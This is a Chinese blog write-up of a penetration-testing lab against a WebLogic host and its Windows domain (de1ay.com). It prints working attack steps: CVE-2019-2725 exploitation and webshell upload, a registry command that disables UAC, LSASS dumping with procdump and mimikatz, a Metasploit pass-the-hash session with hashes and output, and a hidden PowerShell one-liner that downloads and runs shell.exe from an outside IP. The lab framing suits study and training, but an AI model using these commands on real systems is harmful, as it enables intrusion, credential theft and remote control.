前言:

一开始是全使用msf打通的,后面使用了cs打通,所以思路可能有点乱。。。

Alt text

按照作者给的配置情况,配置完成后,启动weblogic服务。

Alt text

根据cve_2019_2725反序列化漏洞,检查出存在漏洞。

Alt text

直接上传冰蝎木马。

Alt text

成功连接上冰蝎。
后使用冰蝎的反弹shell模块,成功反弹到meterpreter

Alt text

Alt text

通过ip发现存在另一个网端。
通过ipconfig /all 发现存在域,域名为de1ay.com
通过nslookup -type=SRV _ldap._tcp.corp定位域控,域控为10.10.10.10

Alt text

远程桌面3389度端口开放

Alt text

systeminfo发现信息

Alt text

并且机器只安装了三个补丁‘

[01]: KB2999226
[02]: KB958488
[03]: KB976902

使用cs进行内网探测发现内网三台机器

Alt text

思路一:

tasklist查看服务发现安装了360杀毒

我们来进行提权操作
通过补丁对比,我们发现ms_15_051可使用,于是我们用其进行提权。
这里不知道怎么回事,一直报错,可能是uac搞的事,于是我们进行bypassuac,在shell中输入C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f然后shutdown /r重启计算机,等待管理员的再一次登陆。
随后在进行提权吧,这种思路,太过于鸡肋,所以实战中还是不要使用。

后面使用cs,直接使用自带的提权使用ms_14_058提权成功,果然还是cs大法好。

思路二:抓明文

另外我们还可以通过procdump lsess.exe进程数据离线免杀抓取明文,从而绕过360的监控。

上传procdump到机器,执行procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

Alt text

将lsass.dmp下载下来。
本地的mimikatz.exe执行

  • sekurlsa::minidump lsass.dmp
  • sekurlsa::logonpasswords full

成功抓取明文密码

Alt text
Alt text

由于前面我们发现3389端口开放,于是直接上3389。这里我们有个思路,连上3389后,探测内网机器3389是否也可登陆,于是我们见可以使用我们得到的账户密码,进行3389登陆,也就是3389+3389+n。但是这里我们登陆不上3389,提示:未授予用户在此计算机上的请求登录类型,说明web机的本地策略中拒绝了我们的账户。

那我们上传regeorg进内网。
这里的weblogic asynchttp://192.168.70.129:7001//_async/的路径为C:/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/

连接上regeorg后,直接使用proxychains 进行3389连接PC机器(10.10.10.201)。

Alt text

思路三 PTH

其实这里还有种思路,直接使用前面得到的域管理员密码进行PTH

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf5 exploit(windows/smb/psexec) > set SMBDomain de1ay
SMBDomain => de1ay
msf5 exploit(windows/smb/psexec) > set SMBPass f67ce55ac831223dc187b8085fe1d9df:161cff084477fe596a5db81874498a24
SMBPass => f67ce55ac831223dc187b8085fe1d9df:161cff084477fe596a5db81874498a24

msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp

msf5 exploit(windows/smb/psexec) > set rhost 10.10.10.201
rhost => 10.10.10.201

msf5 exploit(windows/smb/psexec) > run

[*] 10.10.10.201:445 - Connecting to the server...
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.201:445-<><>-OK
[*] 10.10.10.201:445 - Authenticating to 10.10.10.201:445|de1ay as user 'administrator'...
[*] 10.10.10.201:445 - Selecting PowerShell target
[*] 10.10.10.201:445 - Executing the payload...
[+] 10.10.10.201:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 10.10.10.201:4444
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.201:4444-<><>-OK
[*] Sending stage (180291 bytes) to 10.10.10.201
[*] Meterpreter session 1 opened (127.0.0.1:59608 -> 127.0.0.1:8888) at 2020-02-10 11:38:47 -0500

meterpreter > 

现在已经拿到了PC机器了,且为SYSTEM权限。
同样我们也可以使用PTH拿到域控机器的SYSTEM权限。

思路四:

因为前面我们已经得到了明文密码,所以可以直接使用微软提供的psexec.exe工具,得到system权限的cmd,后可搭建ftp服务器或者可通过proxychains -m SimpleHTTPServer 80,通过poweshellcmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://192.168.85.159:7777/shell.exe','shell.exe');start-process shell.exe下载木马执行,最终反弹到meterpreter上,且权限为system.

最后修改:2020 年 06 月 17 日 02 : 37 PM
如果觉得我的文章对你有用,请随意赞赏